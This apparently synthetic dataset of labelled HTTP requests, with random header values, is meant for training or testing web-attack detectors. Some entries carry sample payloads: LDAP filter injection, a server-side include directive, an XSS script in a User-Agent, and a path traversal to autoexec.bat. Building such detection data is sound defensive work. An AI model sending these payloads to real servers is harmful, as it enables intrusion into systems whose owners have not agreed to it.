Cookie: s6wurn=i7b;sbn3n=973223272;etcVHt_aC6u=4234129;hucaidfh=sSty4tuH;ahytiI5jriu=Tscriptrhse@o;unu4phifcrf=tKaD
Cookie2: $Version="4"
Date: Sat, 27 Sep 08 12:10:39 UTC
ETag: "OTQ9F18x@_S7jK-"
Expect: 100-continue
From: esjrw@sdiElnyr.fr
If-Modified-Since: Sun, 01 Nov 09 15:46:51 CET
If-Unmodified-Since: Mon, 17 Mar 08 23:49:31 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Aug 04 06:17:14 CET
Max-Forwards: 6678
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: Basic dG1pNWlldDp0bmtiaHVxZQ==
Range: -17
Referer: /b4teotes.html
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.7 (compatible; Konqueror/2.1; Win 9x; mdtw4deo; uOU7en; sEoueobe1)
UA-CPU: PowerPC
UA-Disp: 6094,118,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0773x113
Via: HTTP/7.7 37.22.249.107:4, HTTP/4.1 18.242.184.220
Transfer-Encoding: gzip
Upgrade: uRh8ia/4.7
Warning: 520 59.225.217.165:5331 "eos2vb" "Sun, 09 Mar 08 14:23:53 UTC"
X-Forwarded-For: 37.92.1.154
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3184
Start - Id: 15272
class: Valid
GET /lrvvt0tQEsCcVx3li0YI/fdfW_Kq/ehJ/invgrs@/3l4esndEdn3m.cgi? HTTP/1.0
Host: 64.130.86.97
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: 4hpi-Essunja, rh-dihwscen;q=0.6, gmertiet-t5;q=0.0
Cache-Control: no-store
Client-ip: 68.75.101.86
Cookie: hp=79077;dahjleleag=1Iadizimcfre;5sui9ns=cNk2onfaeeqpeit;elev9niohed=n;frto=qn9rfab9toeetnbgfi
Cookie2: $Version="4"
Date: Sun, 14 Mar 10 10:41:39 GMT
ETag: "S76VsqJi0ajsqdZ"
Expect: 100-continue
From: 4b6lt@iaCisxokO.it
If-Modified-Since: Sat, 04 Aug 07 09:26:29 CET
If-Unmodified-Since: Mon, 06 Oct 08 18:04:28 GMT
If-Match: *
If-None-Match: "Y58nJd4u@z8m6lr.7TaK"
If-Range: "n9WbJy0FDy9c.x6bPdI8"
Max-Forwards: 40
MIME-Version: 5.6
Pragma: rsemailb='hrcsny'
Proxy-Authorization: Basic ZWhhcHRhaDphY1Mycg==
Authorization: Digest username="tMlh0"
Range: -425
Referer: /7rdreu.jpeg
TE: trailers
Trailer: If-Match
User-Agent: 8ntTd6oo (et_gMOibJ8; 4Z6rMAUgEM)
UA-CPU: PowerPC
UA-Disp: 8576,0816,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9424x098
Via: 5.4 www.ilr8ee.jpg:64, 6.7 www.utmom.jpeg, HTTP/5.1 141.129.240.51
Transfer-Encoding: g43d
Upgrade: b6ii0/3.3, tteonn/2.3, yey/0.7, ic6n8/2.9, a0t/1.3
Warning: 995 172.185.188.148 "OcSZC" "Sat, 30 Jul 05 15:15:26 UTC"
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 193733514519780157
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15272
Start - Id: 33113
class: Valid
POST /et/ceuZUsrRxkRYzn1tije/aNo/lPT2nph-.jpg? HTTP/1.0
Content-Length: 242
Content-Language: tSa1S
Content-Encoding: compress
Content-Location: http://www.nnpq.it/Tsdgtid/selhs/HfDselih.fgf
Content-MD5: aWVlbmllb2R3N2F1YWlPcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Jun 09 09:37:47 CET
Last-Modified: Wed, 07 Dec 05 17:14:53 CET
Host: 5.36.249.56
Connection: close
Accept: application/rtf
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ea9wdeaj-eiocih, Dnekhend-magTtoe, ttyr-es;q=0.5, nrldeaH-dme;q=0.2, ijznrr-l6n
Cache-Control: only-if-cached
Client-ip: 230.124.221.154
Cookie: NzRlixbee=421;ttMpmt=iAe 9sdelete ?[I3We
Cookie2: $Version="857"
Date: Tue, 12 Feb 08 12:33:06 GMT
ETag: "m79RPMN@q7jb12bi"
Expect: lopnwT0=ei8deh
From: ryupoa@thaex.ch
If-Modified-Since: Fri, 22 May 09 03:26:37 CET
If-Unmodified-Since: Sun, 29 Jan 06 23:34:43 UTC
If-Match: "skf551gwvuuWyHjZLoo"
If-None-Match: "j1POeRSyZmALecCGNbB-"
If-Range: Wed, 15 Sep 04 11:59:07 CET
Max-Forwards: 348
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZGpUYW1TOmRtYXN4bDQ=
Authorization: Digest nc=c1e03B3a
Range: -794940,20-24662
Referer: http://www.tnd4rpyl.ch/Mrd8iu.cfm
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 2.4; ea-lt; rv:5.1.8) Gecko/03384528
UA-CPU: Sparc
UA-Disp: 8524,604,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6581x441
Via: 1.3 www.gLmtci.shtml:46438, 2.0 www.og30kst.jpg:61, FTP/7.8 254.215.161.17
Transfer-Encoding: deflate
Upgrade: dto/7.0
Warning: 956 www.r68u.htm:49944 "evd84o8ca9e" "Thu, 15 Dec 05 04:21:49 CET"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1678510010970720338
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

6xitieideaFsD=0gw4IG&aeat=1394805033&hH-iEYp=8551818085&i0icpr8wen2=Gk&prj=Smqr2oanizrsoehn&eos=cOFDRWcM&mnltgk7ms=1ih&autoexecz-vGlreplaceK=5044&a7tleEheu=o&gorogipt9=6h4so6ls&to=157159&0LNbe9Ats6=fsojeaU&98rnlttoWiw=u;wtvcrs>t oy-ii$a

End - Id: 33113
Start - Id: 26168
class: Valid
GET /ouwsn47mdeklafi/lz8eG4HR5W0EhuF2Uj/hP0childvF7.sh?fuhsenx8=narsjr&sod5th=3&nandntdc4stS=vget&CA@Y=%26etc%5D%29pl%3D&eb8a2hidf=672235&ptleweyYhscsnie=24536&eeoo=o%2F&usMek=eSGmKeB&oyyerhGrhtM=Yerjti&uZJ_WKFV=rn&aeaeh=350639&wlpm=6055647&eroeeqeb46g=siNtOsVemrrr&yl3T=+A1 HTTP/1.0
Host: 227.48.54.26
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, euc-jp, euc-tw, macintosh, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=2
Client-ip: 110.150.5.172
Cookie: crmtirasbuc8u=cDkn0Q;DWlQ-pa7GIZA=vyX5;niaecDias2td=inagtsmsu;drisvbe7mahem=a9passthruhsystemRer-r FcLdt;7iwLaheacritrtm=5185;uritnnmmx=6poiS/|ustdinhtaccess formlocationed&dh
Cookie2: $Version="949"
Date: Sat, 16 Jul 05 15:56:28 GMT
ETag: "BEYBBGwLFnk4PHTl3"
Expect: 5w5dueI=iiot
From: tiem@gaat5h.cz
If-Modified-Since: Sat, 01 Aug 09 03:06:27 UTC
If-Unmodified-Since: Fri, 03 Jun 05 01:59:41 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Jul 09 18:00:08 UTC
Max-Forwards: 8138
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="renotae"
Authorization: Digest opaque="Gonohwud"
Range: 18-
Referer: http://hnjqsaTc.ch/2tRoe2d/rim6.pl
TE: trailers,gzip;q=0.8
Trailer: TE
User-Agent: a2cRwpHhX http://www.hsamuzmh.gov
UA-CPU: 68000
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7580x3767
Via: FTP/0.5 211.65.121.206, 2.1 www.g5pls.css, 2.4 www.qlrakww.htm
Transfer-Encoding: c8neo; fthneu=kRdhrwiP
Upgrade: sbthb/1.3, ctm/5.8, jMsOp/9.9, 0wrop/6.2, 2uaa1/2.7
Warning: 091 41.251.186.23 "rRst8cre" "Sat, 21 Feb 04 24:26:15 GMT"
X-Forwarded-For: 102.26.95.103
X-Serial-Number: 77624336
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26168
Start - Id: 3507
class: Valid
GET /tkN/f223C.cfm?n2=ae%25ewhere&hdDtexh6=pe4te&7YL2=oM1FSFhS&zt=Nb%5D&3RlSJ=1421483&dt9sUsillae=cUdys+rEf&deax=89919&3EhtEkj7emekx=3&tew=oaoRrgdacub&eedTtlt=2228152&opnlwjdv=6292293&tu4ute=gdsystem%2F+ei2 HTTP/1.0
Host: www.yiha0unY.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 61.50.151.28
Cookie: ajneanj=[etct;sogR1licsei=n81;xdeb=50371343;soGhnsaRlw=7;ue0=labXMR
Cookie2: $Version="02"
Date: Fri, 05 Aug 05 19:48:01 GMT
ETag: ".8_hh5YZ3ai.FMsSeKw"
Expect: 100-continue
From: 4qmTaq3m@xens.uk
If-Modified-Since: Sun, 16 Sep 07 09:39:46 UTC
If-Unmodified-Since: Sat, 30 Jul 05 03:55:16 CET
If-Match: "9-piYqwHW@aATG_cp8z"
If-None-Match: "D_Z_vSTJXyVFI_Er"
If-Range: Sat, 18 Dec 04 08:28:42 GMT
Max-Forwards: 7457
MIME-Version: 7.3
Pragma: dI=z9w
Proxy-Authorization: NTLM eXNhcGFJMmxyMGk3TnV2aWl1b3A3dGFndHZmYWllZGNpc25wb2w=
Authorization: NTLM dHRudWVuMnNsaWRoczFadHhoaWFpYnRpcnJudXNSckFvbm5FY2xlZTJz
Range: 268680-567,-58
Referer: http://mti9iS.net/3h4km/t3ilrczF/fharnnsi.tiff
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 4.6; to-tc; rv:5.5.1) Gecko/01250778
UA-CPU: StrongARM
UA-Disp: 845,505,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3900x7810
Via: HTTP/1.8 www.ne4Net.png, 2.9 227.76.195.248
Transfer-Encoding: deflate
Upgrade: inat/2.9, rRci/3.1
Warning: 705 www.emid.html "2woor4" 
X-Forwarded-For: 36.213.69.49
X-Serial-Number: 8528165138107530
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3507
Start - Id: 20686
class: Valid
GET /gt6YA7noX41NN/oopyY@zIc3GkhK5MHF5/fxOsamrD20x/ei-tg96xE2w/a1/tI/nilki/h1O3u@c61/8MwZjy1mna/ArndBf8.htm?7CidE=d&aZ7Hoz8J3HS=dh_kgEnSqX4&t0d1TehpacTU=teze%3ES%3Bca&s3tatt=+eL%2Bue5tsereipsiri&8ausc=aq7kcB2g3rE&onrtoEwero67=Rfa3l&toaysr=av&rdyeNbxfhis=9&Oeep=3225379&thlShlr23aR3r=7&ecaGNinniytgsfL=rrseoeHRkn&ed=nsIt%5DktNtcer HTTP/1.1
Host: 89.81.116.88
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 84.226.49.215
Cookie: bn=fselectelsS;rta0a=8019;og4u4s=1836219;4basenieawmis=04nmvar1lN;tqvuhs7ei7=yGB4YCv
Cookie2: $Version="37"
Date: Fri, 07 Jul 06 09:01:20 CET
ETag: W/"e6Hm@YjLKPPcELj_"
Expect: 100-continue
From: erodgar@nLrefgs3o.org
If-Modified-Since: Fri, 16 Jun 06 22:36:51 GMT
If-Unmodified-Since: Thu, 06 May 04 24:10:05 GMT
If-Match: "por0CWurGLxEvkG"
If-None-Match: "X9IcABb@NQl5BUc4Uwk"
If-Range: "DkvT8tRP-76AszQo"
Max-Forwards: 9
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic SXM3RDptc2cybWljbw==
Authorization: bojslc tBtp=5Soner
Range: 28-,-887274
Referer: /zttn1.pl
TE: deflate
Trailer: Accept-Charset
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 9.8; ol-hk; rv:1.0.0) Gecko/43293273
UA-CPU: PowerPC
UA-Disp: 8694,520,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 413x553
Via: FTP/7.9 125.197.93.1:38992
Transfer-Encoding: compress
Upgrade: et7it/4.5, ubres/6.9, ano/2.1, eoeZe/8.3, Rosue/4.4
Warning: 808 224.86.131.197 "arIeIsaddssIt" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20686
Start - Id: 38839
class: LdapInjection
GET /kFwkIyDN6J48i3/933HxHacLGkGaiGmu7D/ehgrdHbsXjHi@/isotbAEthasir/c8a7et3zhdaczaeb3e/nu75_/neebtai6sauietrdHgoe/Ra3Ldxboot.ini.htm?cepnweir=b&Aam1bollt=%29+%28++%7C++%28nunwR%3Dep*%29 HTTP/1.0
Host: 51.76.103.74
Connection: close
Accept: text/*, application/postscript, text/xml;q=0.7
Accept-Charset: windows-1250, iso-2022-kr, euc-cn;q=0.9, iso-8859-6
Accept-Encoding: gzip;q=0.5, compress;q=0.4, gzip;q=0.2, identity;q=0.5
Accept-Language: iar-ofnyr
Cache-Control: max-stale=04
Client-ip: 247.197.51.53
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="98"
Date: Mon, 24 Jan 05 19:58:26 UTC
ETag: W/"Pd2SaruN6n0VuUgvz"
Expect: 100-continue
From: oeee@geqtla3o.org
If-Modified-Since: Wed, 20 Oct 04 10:41:46 UTC
If-Unmodified-Since: Sun, 09 Mar 08 08:08:04 GMT
If-Match: *
If-None-Match: *
If-Range: "4sgc7PzaIXD3Qy4z@Npk"
Max-Forwards: 84
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: oxtNc mgheq=svee9Num
Range: -83,96723-251385,-0483
Referer: http://minehc.net/hDdOh/rcStzdad/nctM3geH/fRtn/inxihe.asp
TE: gzip,chunked;q=0.0,chunked
Trailer: User-Agent
User-Agent: eC_Ltf http://www.iGigTMn4.st
UA-CPU: PowerPC
UA-Disp: 062,1394,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: FTP/3.8 148.150.156.63, HTTP/6.3 111.10.246.166, necr/4.9 www.r8o1sf.htm
Transfer-Encoding: Eo5p; HcvteOsl=eaceet
Upgrade: tocy3/3.8
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38839
Start - Id: 375
class: Valid
GET /tvxWosyaosddb8ismRp/0qyc4AQT83NJeqFFG.dll?ecilo=fzot&lftyebneni=tWeqgUeJ2r&2leapltfem2ri=at&objectooVb=hehia&qe9rlogI=8nfrsbnacrIhWne&netcatKinoglid29Vdx=l.LgGjqjRDw&htsh0chO=7&hertt1iIi=7n&tittesn=2&c9uthelSr6o0tmf=i%3Escript54d8&aG8h%uzZs=e1 HTTP/1.0
Host: www.tr17d.gov:80
Connection: close
Accept: video/*;q=0.0
Accept-Charset: x-mac-korean, gb2312;q=0.4, iso-8859-2, x-mac-arabic, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: ie-cateo
Cache-Control: only-if-cached
Client-ip: 197.140.152.87
Cookie: RW76qLE9=05213;elink_JcW.8bTLR=aRFiIvuwYAjP;between1s-ynI8yd@=0316;6xdejeoEDene=;>cd2tmponosamo4s
Cookie2: $Version="75"
Date: Sun, 25 Jul 04 14:17:59 CET
ETag: W/"qN046fEpv6REy5KApOF"
Expect: caxlro
From: 7osi@ddydoOhs.net
If-Modified-Since: Wed, 12 Jul 06 09:57:58 UTC
If-Unmodified-Since: Fri, 26 Nov 04 04:50:43 UTC
If-Match: "pBXzMeFi9ZJ8-w-f4hG"
If-None-Match: "N@bTnUGkWboYrWk0"
If-Range: "YO2abdhF4cFZz-za"
Max-Forwards: 42
MIME-Version: 0.4
Pragma: p='Wai'
Proxy-Authorization: Digest username="iWrams"
Authorization: hfiTg ty8r9=xidia
Range: 60-95,-13,615-290
Referer: http://s2tEt4.de/ae1AiWd/tqhrg2pe.pdf
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/7.6 (compatible; MSIE 1.0; Win98; dstl9eloms; be0ctHnxou; 6sgtelivr)
UA-CPU: StrongARM
UA-Disp: 4410,166,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0397x2303
Via: 1.9 www.bseehwto.gif, 1.6 185.197.253.219
Transfer-Encoding: gzip
Upgrade: sc3s/5.1, dtoP7n/7.1, ndxl/8.8
Warning: 019 www.rqism.png "eeerrEetourerTuu" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 375
Start - Id: 39261
class: SSI
GET /hobtCd/ogO@/xBYrf2qS/gste9sniimNr/Kl3bD/tMSsV.fNm8tRK/rNIeamen/fsh5ik/i2CgOKURsRS/eXQcqttGe/ohUsC3uxfL0_.htm?2AIVRBmocha=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&hsape=1820&QoLexecIjPFb=8-o-W7YPtDpC&melsesgaacesu=%28&nz8yctActsunsr=5063590&wrpcisiesoet=g8s&a7eShm=15042 HTTP/1.1
Host: 235.214.37.156:3
Connection: E850obs
Accept: application/zip;q=0.2, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 120.3.200.190
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="81"
Date: Thu, 11 Jan 07 23:33:30 CET
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Thu, 19 Jun 08 08:12:12 UTC
If-Unmodified-Since: Tue, 17 Jan 06 08:13:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 233
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: tuA4c nrgp=nrrh
Range: 6-,-42,-764390
Referer: /issra/sSsqc.wav
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/3.4 (Windows; U; Win98 9.1; dt-hd; rv:2.3.2) Gecko/49045260
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 272x2054
Via: 8ita/4.1 250.232.238.196, FTP/3.3 102.68.73.46
Transfer-Encoding: gzip
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 287 126.35.36.107 "nswieognJ8y6pns" "Thu, 06 Oct 05 08:40:40 UTC"
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39261
Start - Id: 46602
class: XSS
GET /icflUA2mp9insertwp-kIT/xH5T0dv/tWJ1-So/nqNYWA.OJqt@cBtJRpf/nYr59wa8marsa3/lasTseeuhi2rtdjRos7A/gXvdP-VyxGVnV/qcTlmsnsctccmdyHj/Ls48aefdbtx.bin? HTTP/1.1
Host: www.1cinrure.de:381
Connection: keep-alive
Accept: application/zip;q=0.5, image/*;q=0.6, audio/basic;q=0.0
Accept-Charset: x-mac-roman
Accept-Encoding: deflate;q=0.9, compress, deflate, identity, gzip;q=0.2
Accept-Language: obb-eoideo, 5e-auamr;q=0.4, l-oril8;q=0.7, KoRet-d1rHrgt, 4ei-bawntn;q=0.7
Cache-Control: max-age=6
Client-ip: 115.60.4.78
Date: Sat, 07 Oct 06 15:14:42 GMT
ETag: W/"@R16B8fmuZ9p2_LLZY"
From: Jthbz@Aett6xa.be
If-Modified-Since: Wed, 27 May 09 17:13:43 CET
If-Unmodified-Since: Wed, 25 Aug 04 11:25:32 UTC
If-Match: ".P9XDPagwTBXl84"
If-Range: "w9n43D-q@cLzQ.4YuX"
Max-Forwards: 9171
MIME-Version: 0.9
Pragma: sdeenei=mzc
Authorization: Nsreoc eof92l=aenuTirw
Range: 29-,197659-,4-7273
Referer: http://elnd.gov/lcnr.conf
TE: trailers,trailers
User-Agent: <bgsound    src =" javascript:    [alert ('hu3eeoacu');]     "  >
UA-CPU: x86
Via: HTTP/3.7 180.36.235.197, FTP/3.0 www.nn8n.css
Transfer-Encoding: identity
Upgrade: 1ssnt/2.7, Necil/0.4

null

End - Id: 46602
Start - Id: 2778
class: Valid
GET /sccoh/nxp1/rni1calHrytr7ee8c/emarneerra/8uYfvsFrGEprckY/tOI/s7yMGN6AMWDinetcatU/abnAbZFvklODGwwgnVf/b2JK0amfNWvarXynode/tJRtECb3A6XTlsP.ORP.js?pgai=9010459016&9egrnnSm=33323&Drhrehhexsnlee=528&ew49lpsioddyrz=l%29or3&tftsx81auea5=11611&stsslr=nE&xp_vfGp=nconnecteod%3Bunionm HTTP/1.1
Host: www.aoga0aa9.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Nyy-gbojrh, ttoKnaan-b5, aoto-dupLtlc8, x4-PiTna;q=0.4, 8ocL71s-elwHE;q=0.2
Cache-Control: no-transform
Client-ip: 188.5.26.126
Cookie: vie5d=cetn);eei=nnooh/1xe&9;aI=owinntcers5rdaoe3se;Rdeznrnolfp5tq=tcashutdownC;4di5aalno86yn7e=najr5totrsdaudeis;igl0tde4=textermn
Cookie2: $Version="78"
Date: Mon, 13 Aug 07 06:18:01 GMT
ETag: W/"12TedjeK8uSs1I9.Mo4"
Expect: 8rlgu=eqs8
From: 7nttm@aa4uGahn.st
If-Modified-Since: Sat, 30 Dec 06 11:43:00 CET
If-Unmodified-Since: Mon, 05 May 08 06:47:46 CET
If-Match: "4Q.7H_-v30NFu1Z5vm5_"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.1
Pragma: O=p6tozbNa
Proxy-Authorization: Digest realm
Authorization: Digest opaque="fDe6hi"
Range: 771-26
Referer: /i0Eml.cfm
TE: gzip;q=0.8,deflate;q=0.1,trailers
Trailer: Warning
User-Agent: torto7m/4.8.3
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 944x3965
Via: HTTP/3.8 www.oansoe4r.shtml, HTTP/2.4 15.101.181.123
Transfer-Encoding: deflate
Upgrade: Sbhjos/1.1
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2778
Start - Id: 16184
class: Valid
GET /n5/fl_KdIL3xMn3@/FaconnectwinntYa/tL_e9S6eU.js? HTTP/1.1
Host: www.cs0ksg.org:703
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, utf-8;q=0.5, euc-tw;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 8.227.150.151
Cookie: ecrgT=rfs4sgWGnnicreR0;nmeiNawElnhuem=\ee;autoexeczamlhadmin-EL=cnsmlgcma;FxCk.formxT8logG=\s
Cookie2: $Version="114"
Date: Mon, 13 Jul 09 19:16:12 UTC
ETag: "GdpkdGTcDO4ooYNc83N"
Expect: mpnioir=nome;7utacuek
From: oltae@ieknifNr4.org
If-Modified-Since: Mon, 06 Jun 05 10:33:23 CET
If-Unmodified-Since: Sat, 04 Jun 05 14:59:25 CET
If-Match: *
If-None-Match: *
If-Range: "noaBxBVI_Gcijl.DyK"
Max-Forwards: 0931
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic YWlybDJjOXg6bG93YQ==
Authorization: Digest opaque="xIowpScs"
Range: 2181-,58-,9-1
Referer: /spnts9.pl
TE: gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/9.7 (compatible; 1Etsene; Open BSD i386; vueaAlhZ)
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 6.1 203.162.164.190, HTTP/3.8 www.phwerc.shtml
Transfer-Encoding: compress
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 66.190.19.60
X-Serial-Number: 4241402409
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16184
Start - Id: 45423
class: PathTransversal
POST /faee/2YPwWj.GmEfhZ.nsf? HTTP/1.1
Content-Length: 164
Content-Language: axr
Content-Encoding: gzip
Content-Location: http://Almitrsn.de/tawesth/imqa/ss1oTi/tcthds/eeps.sh
Content-MD5: NTE4ZWplbW1tbm1Lb2FZZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 May 04 09:48:32 UTC
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: 198.249.203.77
Connection: teoj
Accept: */*
Accept-Charset: hz-gb-2312, hz-gb-2312, iso-8859-9;q=0.1, windows-1253
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: max-stale=005
Client-ip: 186.229.57.172
Cookie: yaiLdeaejt=6619799
Cookie2: $Version="494"
Date: Tue, 08 May 07 24:17:46 CET
ETag: W/"YIv7-YIQ3UOzG@Xq"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Fri, 29 Jan 10 07:20:09 GMT
If-Unmodified-Since: Tue, 23 Mar 10 23:50:25 UTC
If-Match: "UEz5I0Gr9q@D7yhf"
If-None-Match: *
If-Range: "5CdIAaHaeVtVnd1IP"
Max-Forwards: 7
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic amR6cnNrcjp0ZXJ0
Range: -292636,082693-
Referer: /ewvphgfl/Lta2les/tcsA.avi
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 3.4; ei-ea; rv:6.2.6) Gecko/07726371
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: HTTP/5.4 www.isiktvkv.css:4322
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

km6iiaeix=9ostr&Fra96gW3=0799021&s5nC=4299&ese8z=677&ocitjhit=3940&44zzCbD=../../../../../../../../../WINDOWS/autoexec.bat&8gsT1noo=x589ZAjQ53fc

End - Id: 45423
Start - Id: 16398
class: Valid
GET /e1yGU/eFcVt9kbYBufvqwPw/rmne/oi5fxHGEG6YIIcb/Rdrsinf2q6eb/u.SV/ewhiCvaoO4Obu.swf?ZmDGTe5=0renp%3FErt&n3pf1omn=56&siseaiSastltse=onedeh&coeyimrs9=3014923&ttCNiamn=761&Q-nCQK3cC=tANIpr1&mJ4vZs1h2=+%3B%40sj HTTP/1.0
Host: www.ihmi.fr
Connection: e0AW3tls
Accept: audio/*
Accept-Charset: iso-8859-1;q=0.5, cp-936;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 129.156.31.222
Cookie: 4ahe3lrerrist1=pNtwi4raooptq/;setheeet76dG=1405;bdesa=gjewarTeap
Cookie2: $Version="194"
Date: Mon, 09 Oct 06 20:34:30 UTC
ETag: W/"ZIG0mH3usshyOTtm_5"
Expect: 100-continue
From: piRire@gfja0tm2d.be
If-Modified-Since: Thu, 31 Jul 08 14:11:36 GMT
If-Unmodified-Since: Sun, 11 Jan 09 02:09:27 GMT
If-Match: "ONStIcmdi1ihdr@2n"
If-None-Match: "xlHy7F7si.JGmMt"
If-Range: "xstZ8WybvsGxmdpVMK."
Max-Forwards: 607
MIME-Version: 2.3
Pragma: 3dIdu=awodte
Proxy-Authorization: Digest opaque="e9apj"
Authorization: NTLM dGhJbnJQc2ZOd3N1YXRybWxmZXNhTmdobmNsaHR0ZWU1bmU5c2FvM3Fma2F5dw==
Range: 9-3931
Referer: /eylme/1iatmif4.zip
TE: trailers,trailers
Trailer: From
User-Agent: h.GcjAJPI http://www.keueoey.com
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 2.3 www.rnNd.jpeg:85959
Transfer-Encoding: identity
